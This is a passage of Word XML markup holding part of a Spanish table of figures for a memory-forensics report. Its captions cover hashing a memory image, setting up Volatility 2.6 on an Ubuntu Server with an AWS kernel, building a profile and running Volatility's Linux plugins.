        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782574 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5993EF22" w14:textId="079FD7FD"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27" w:anchor="_Toc155782575" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Captura imagen hash archivos.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782575 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B49E111" w14:textId="65163602"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28" w:anchor="_Toc155782576" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Captura imagen hash PowerShell.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782576 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C4C0A5C" w14:textId="7425FA74"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29" w:anchor="_Toc155782577" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Captura Imageinfo.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782577 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0C366CAD" w14:textId="364725FE"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30" w:anchor="_Toc155782578" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Búsqueda string linux_version.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782578 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1EF3E910" w14:textId="4B0EB27B"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31" w:anchor="_Toc155782579" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Características VM Ubuntu Server y kernel inicial instalado.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782579 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0E40D7D8" w14:textId="3271F5B6"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32" w:anchor="_Toc155782580" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Buscando Kernel AWS.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782580 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="68A52274" w14:textId="74EA31FC"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33" w:anchor="_Toc155782581" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Procediendo a descargar kernel de aws.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782581 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2227A3B2" w14:textId="4501B9DC"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34" w:anchor="_Toc155782582" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Comprobando que el kernel aún no está instalado.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782582 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>28</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="65BF9830" w14:textId="4533FC73"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35" w:anchor="_Toc155782583" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Reiniciando Ubuntu Server y comprobando funcionamiento kernel AWS.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782583 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>28</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="023E4FF2" w14:textId="25359148"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36" w:anchor="_Toc155782584" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Generando make.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782584 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>29</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B8D969C" w14:textId="64D8322C"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37" w:anchor="_Toc155782585" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Instalación de dwarfdump, Python 2.7, pip, Volatility 2.6 y sus librerías correctamente instaladas en el Ubuntu Server con kernel AWS.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782585 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>29</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="71D7B224" w14:textId="6F636006"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38" w:anchor="_Toc155782586" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Nombre de perfil.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782586 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>29</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7ADA0D41" w14:textId="7226EFDD"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39" w:anchor="_Toc155782587" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Generando perfil y visualizando su ubicación.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782587 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1A3B7253" w14:textId="010BD4BF"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40" w:anchor="_Toc155782588" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Nombre de perfil.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782588 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="759D896E" w14:textId="574F3541"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41" w:anchor="_Toc155782589" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Propiedades del perfil y comprobación.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782589 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="37AE3267" w14:textId="637B38DB"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42" w:anchor="_Toc155782590" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Comprobación de funcionamiento del nuevo perfil.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782590 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>31</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="30D0738F" w14:textId="21FD85C2"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43" w:anchor="_Toc155782591" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Comando linux_cpuinfo.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782591 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>31</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="47EDFC22" w14:textId="45868188"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44" w:anchor="_Toc155782592" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Comando linux_banner.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782592 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>31</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0FEE6D43" w14:textId="0A2FDEA1"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45" w:anchor="_Toc155782593" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Comando linux_mount.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782593 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48E24CB3" w14:textId="662398A0"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46" w:anchor="_Toc155782594" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Comando linux_memmap.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782594 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2CA5530F" w14:textId="54AF1F1E"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47" w:anchor="_Toc155782595" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Comando linux_iomem.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782595 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5D702CBB" w14:textId="702142B4"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48" w:anchor="_Toc155782596" w:history="1">
